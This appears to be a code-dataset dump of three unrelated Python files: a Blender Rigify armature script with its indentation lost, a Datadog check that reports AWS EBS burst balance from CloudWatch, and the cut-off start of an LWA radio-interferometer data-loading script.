bone = arm.edit_bones.new('eye.R')
bone.head[:] = -0.1405, -1.6860, 0.4161
bone.tail[:] = -0.3684, -1.6810, 0.4156
bone.roll = -3.1352
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.007']]
bones['eye.R'] = bone.name
bone = arm.edit_bones.new('jaw.master')
bone.head[:] = -0.0000, -1.5791, 0.2788
bone.tail[:] = 0.0000, -1.9421, 0.3386
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.007']]
bones['jaw.master'] = bone.name
bone = arm.edit_bones.new('side_fin.L.001')
bone.head[:] = 0.5220, -0.9078, -0.1343
bone.tail[:] = 0.7928, -0.7598, -0.4802
bone.roll = -2.2826
bone.use_connect = True
bone.parent = arm.edit_bones[bones['side_fin.L']]
bones['side_fin.L.001'] = bone.name
bone = arm.edit_bones.new('side_fin.R.001')
bone.head[:] = -0.5220, -0.9078, -0.1343
bone.tail[:] = -0.7928, -0.7598, -0.4802
bone.roll = 2.2826
bone.use_connect = True
bone.parent = arm.edit_bones[bones['side_fin.R']]
bones['side_fin.R.001'] = bone.name
bone = arm.edit_bones.new('jaw')
bone.head[:] = -0.0000, -1.5791, 0.2788
bone.tail[:] = 0.0000, -1.7326, 0.3041
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['jaw.master']]
bones['jaw'] = bone.name
bone = arm.edit_bones.new('jaw.002.L')
bone.head[:] = 0.0891, -1.5791, 0.2894
bone.tail[:] = 0.1110, -1.7198, 0.3129
bone.roll = 1.4894
bone.use_connect = False
bone.parent = arm.edit_bones[bones['jaw.master']]
bones['jaw.002.L'] = bone.name
bone = arm.edit_bones.new('jaw.002.R')
bone.head[:] = -0.0891, -1.5791, 0.2894
bone.tail[:] = -0.1110, -1.7198, 0.3129
bone.roll = -1.4894
bone.use_connect = False
bone.parent = arm.edit_bones[bones['jaw.master']]
bones['jaw.002.R'] = bone.name
bone = arm.edit_bones.new('jaw.001')
bone.head[:] = 0.0000, -1.7326, 0.3041
bone.tail[:] = 0.0000, -1.8860, 0.3294
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw']]
bones['jaw.001'] = bone.name
bone = arm.edit_bones.new('jaw.003.L')
bone.head[:] = 0.1110, -1.7198, 0.3129
bone.tail[:] = 0.1260, -1.8159, 0.3326
bone.roll = 1.2807
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.002.L']]
bones['jaw.003.L'] = bone.name
bone = arm.edit_bones.new('jaw.003.R')
bone.head[:] = -0.1110, -1.7198, 0.3129
bone.tail[:] = -0.1260, -1.8159, 0.3326
bone.roll = -1.2807
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.002.R']]
bones['jaw.003.R'] = bone.name
bpy.ops.object.mode_set(mode='OBJECT')
pbone = obj.pose.bones[bones['spine']]
pbone.rigify_type = 'spines.super_spine'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.neck_pos = 8
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tail_pos = 3
except AttributeError:
pass
try:
pbone.rigify_parameters.pivot_pos = 5
except AttributeError:
pass
try:
pbone.rigify_parameters.use_tail = True
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, True]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.T.Bk']]
pbone.rigify_type = 'limbs.super_finger'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.primary_rotation_axis = "Z"
except AttributeError:
pass
pbone = obj.pose.bones[bones['back_fin.B.Bk']]
pbone.rigify_type = 'limbs.super_finger'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.primary_rotation_axis = "Z"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['mid_fin.Top']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['mid_fin.Bot']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.T.001.Bk']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.B.001.Bk']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.T.002.Bk']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.008']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chest_fin.Bot.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['chest_fin.Bot.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.005']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['top_fin']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.006']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shoulder.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['shoulder.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['top_fin.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.007']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['side_fin.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['side_fin.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['eye.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['eye.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.master']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
try:
pbone.rigify_parameters.make_deform = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['side_fin.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['side_fin.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.002.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.002.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.003.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.003.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
bpy.ops.object.mode_set(mode='EDIT')
for bone in arm.edit_bones:
bone.select = False
bone.select_head = False
bone.select_tail = False
for b in bones:
bone = arm.edit_bones[bones[b]]
bone.select = True
bone.select_head = True
bone.select_tail = True
arm.edit_bones.active = bone
arm.layers = [(x in [0, 3, 5, 6, 8, 10]) for x in range(32)]
if __name__ == "__main__":
create(bpy.context.active_object) | 39,529 | 0 | 23 |
ea03b83c85944b32b18ad7b834263f15f47ad00f | 2,512 | py | Python | checks.d/aws_ebs_burst_balance.py | mounemoi/datadog-aws-burst-balance | 58c261b69d23185e5a08f19e7d2ce4e43f950121 | [
"MIT"
] | null | null | null | checks.d/aws_ebs_burst_balance.py | mounemoi/datadog-aws-burst-balance | 58c261b69d23185e5a08f19e7d2ce4e43f950121 | [
"MIT"
] | null | null | null | checks.d/aws_ebs_burst_balance.py | mounemoi/datadog-aws-burst-balance | 58c261b69d23185e5a08f19e7d2ce4e43f950121 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from checks import AgentCheck
from boto3.session import Session
import datetime
| 36.941176 | 102 | 0.480096 | # -*- coding: utf-8 -*-
from checks import AgentCheck
from boto3.session import Session
import datetime
class EBSBurstBalance(AgentCheck):
def check(self, config):
if 'region' not in config:
self.log.error('no region')
return
session = Session(region_name=config['region'])
ec2 = session.client('ec2')
next_token = ''
ebs_list = []
while True:
instances = ec2.describe_instances(
Filters=[
{ 'Name': 'instance-state-name', 'Values': ['running'] },
],
MaxResults=100,
NextToken=next_token,
)
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
name = ''
if 'Tags' in instance:
for tag in instance['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
break
if 'BlockDeviceMappings' in instance:
for ebs in instance['BlockDeviceMappings']:
volume_id = ebs['Ebs']['VolumeId']
ebs_list.append({ 'name': name, 'volume_id': volume_id })
if 'NextToken' in instances:
next_token = instances['NextToken']
else:
break
cloudwatch = session.client('cloudwatch')
for ebs in ebs_list:
response = cloudwatch.get_metric_statistics(
Namespace='AWS/EBS',
MetricName='BurstBalance',
Dimensions=[ { 'Name': 'VolumeId', 'Value': ebs['volume_id'] } ],
StartTime=datetime.datetime.utcnow() - datetime.timedelta(minutes=30),
EndTime=datetime.datetime.utcnow(),
Period=300,
Statistics=[ 'Minimum' ],
Unit='Percent',
)
if len(response['Datapoints']) != 0:
self.gauge(
self.init_config.get('metrics_name', 'aws.ebs.burst_balance'),
sorted(response['Datapoints'], key=lambda k: k['Timestamp'])[-1]['Minimum'],
tags=[ 'ae-name:{name}'.format(**ebs), 'ae-volume-id:{volume_id}'.format(**ebs) ],
)
else:
self.log.info('{name} : {volume_id} : failure to get'.format(**ebs))
| 2,345 | 13 | 49 |
765339d4fc4652eb9c074cc80533af5039fad69c | 8,884 | py | Python | main/interferometer_testing_LWA.py | nithyanandan/MOFF | c2bd68b792a5269cfffe1d93b4710eae9ba8ca55 | [
"MIT"
] | 3 | 2019-12-11T07:14:10.000Z | 2020-11-07T19:25:32.000Z | main/interferometer_testing_LWA.py | nithyanandan/MOFF | c2bd68b792a5269cfffe1d93b4710eae9ba8ca55 | [
"MIT"
] | 8 | 2015-08-20T19:46:29.000Z | 2015-09-19T01:31:43.000Z | main/interferometer_testing_LWA.py | epic-astronomy/EPIC | c2bd68b792a5269cfffe1d93b4710eae9ba8ca55 | [
"MIT"
] | 1 | 2019-09-24T19:05:34.000Z | 2019-09-24T19:05:34.000Z | import datetime as DT
import numpy as NP
import matplotlib.pyplot as PLT
import matplotlib.colors as PLTC
import scipy.constants as FCNST
from astropy.io import fits
from astropy.io import ascii
from astropy.table import Table
import progressbar as PGB
import antenna_array as AA
import geometry as GEOM
import my_DSP_modules as DSP
import sim_observe as SIM
import ipdb as PDB
LWA_reformatted_datafile_prefix = '/data3/t_nithyanandan/project_MOFF/data/samples/lwa_reformatted_data_test'
LWA_pol0_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-0.fits'
LWA_pol1_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-1.fits'
max_n_timestamps = 9
hdulist0 = fits.open(LWA_pol0_reformatted_datafile)
hdulist1 = fits.open(LWA_pol1_reformatted_datafile)
extnames = [h.header['EXTNAME'] for h in hdulist0]
lat = hdulist0['PRIMARY'].header['latitude']
f0 = hdulist0['PRIMARY'].header['center_freq']
nchan = hdulist0['PRIMARY'].header['nchan']
dt = 1.0 / hdulist0['PRIMARY'].header['sample_rate']
freqs = hdulist0['freqs'].data
channel_width = freqs[1] - freqs[0]
f_center = f0
bchan = 63
echan = 963
max_antenna_radius = 40.0 # in meters
# max_antenna_radius = 75.0 # in meters
antid = hdulist0['Antenna Positions'].data['Antenna']
antpos = hdulist0['Antenna Positions'].data['Position']
# antpos -= NP.mean(antpos, axis=0).reshape(1,-1)
core_ind = NP.logical_and((NP.abs(antpos[:,0]) < max_antenna_radius), (NP.abs(antpos[:,1]) < max_antenna_radius))
# core_ind = NP.logical_and((NP.abs(antpos[:,0]) <= NP.max(NP.abs(antpos[:,0]))), (NP.abs(antpos[:,1]) < NP.max(NP.abs(antpos[:,1]))))
ant_info = NP.hstack((antid[core_ind].reshape(-1,1), antpos[core_ind,:]))
n_antennas = ant_info.shape[0]
ants = []
aar = AA.AntennaArray()
for i in xrange(n_antennas):
ant = AA.Antenna('{0:0d}'.format(int(ant_info[i,0])), lat, ant_info[i,1:], f0, nsamples=nchan)
ant.f = ant.f0 + DSP.spectax(2*nchan, dt, shift=True)
ants += [ant]
aar = aar + ant
timestamps = hdulist0['TIMESTAMPS'].data['timestamp']
if max_n_timestamps is None:
max_n_timestamps = len(timestamps)
else:
max_n_timestamps = min(max_n_timestamps, len(timestamps))
timestamps = timestamps[:max_n_timestamps]
stand_cable_delays = NP.loadtxt('/data3/t_nithyanandan/project_MOFF/data/samples/cable_delays.txt', skiprows=1)
antennas = stand_cable_delays[:,0].astype(NP.int).astype(str)
cable_delays = stand_cable_delays[:,1]
iar = AA.InterferometerArray(antenna_array=aar)
iar.grid()
count = 0
for i in xrange(max_n_timestamps):
timestamp = timestamps[i]
antenna_level_update_info = {}
antenna_level_update_info['antenna_array'] = {}
antenna_level_update_info['antenna_array']['timestamp'] = timestamp
antenna_level_update_info['antennas'] = []
for label in iar.antenna_array.antennas:
adict = {}
adict['label'] = label
adict['action'] = 'modify'
adict['timestamp'] = timestamp
adict['Et'] = {}
adict['flags'] = {}
adict['delaydict'] = {}
if label in hdulist0[timestamp].columns.names:
adict['t'] = NP.arange(nchan) * dt
Et_P1 = hdulist0[timestamp].data[label]
adict['Et']['P1'] = Et_P1[:,0] + 1j * Et_P1[:,1]
adict['flags']['P1'] = False
# adict['gridfunc_freq'] = 'scale'
# adict['wtsinfo_P1'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# adict['gridmethod'] = 'NN'
# adict['distNN'] = 0.5 * FCNST.c / f0
# adict['tol'] = 1.0e-6
# adict['maxmatch'] = 1
adict['delaydict']['P1'] = {}
adict['delaydict']['P1']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# adict['delaydict_P1']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
adict['delaydict']['P1']['delays'] = cable_delays[antennas == label]
adict['delaydict']['P1']['fftshifted'] = True
else:
adict['flags']['P1'] = True
if label in hdulist1[timestamp].columns.names:
adict['t'] = NP.arange(nchan) * dt
Et_P2 = hdulist1[timestamp].data[label]
adict['Et']['P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
adict['flags']['P2'] = False
# adict['gridfunc_freq'] = 'scale'
# adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# adict['gridmethod'] = 'NN'
# adict['distNN'] = 0.5 * FCNST.c / f0
# adict['tol'] = 1.0e-6
# adict['maxmatch'] = 1
adict['delaydict']['P2'] = {}
adict['delaydict']['P2']['frequencies'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# adict['delaydict_P2']['delays'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data[label]
adict['delaydict']['P2']['delays'] = cable_delays[antennas == label]
adict['delaydict']['P2']['fftshifted'] = True
else:
adict['flags']['P2'] = True
antenna_level_update_info['antennas'] += [adict]
# if label in hdulist1[timestamp].columns.names:
# adict['t'] = NP.arange(nchan) * dt
# Et_P2 = hdulist1[timestamp].data[label]
# adict['Et_P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
# adict['flag_P2'] = False
# # adict['gridfunc_freq'] = 'scale'
# # adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# # adict['gridmethod'] = 'NN'
# # adict['distNN'] = 0.5 * FCNST.c / f0
# # adict['tol'] = 1.0e-6
# # adict['maxmatch'] = 1
# adict['delaydict_P2'] = {}
# adict['delaydict_P2']['pol'] = 'P2'
# adict['delaydict_P2']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# # adict['delaydict_P2']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
# adict['delaydict_P2']['delays'] = cable_delays[antennas == label]
# adict['delaydict_P2']['fftshifted'] = True
# else:
# adict['flag_P2'] = True
interferometer_level_update_info = {}
interferometer_level_update_info['interferometers'] = []
for label in iar.interferometers:
idict = {}
idict['label'] = label
idict['action'] = 'modify'
idict['gridfunc_freq'] = 'scale'
idict['gridmethod'] = 'NN'
idict['distNN'] = 0.5 * FCNST.c / f0
idict['tol'] = 1.0e-6
idict['maxmatch'] = 1
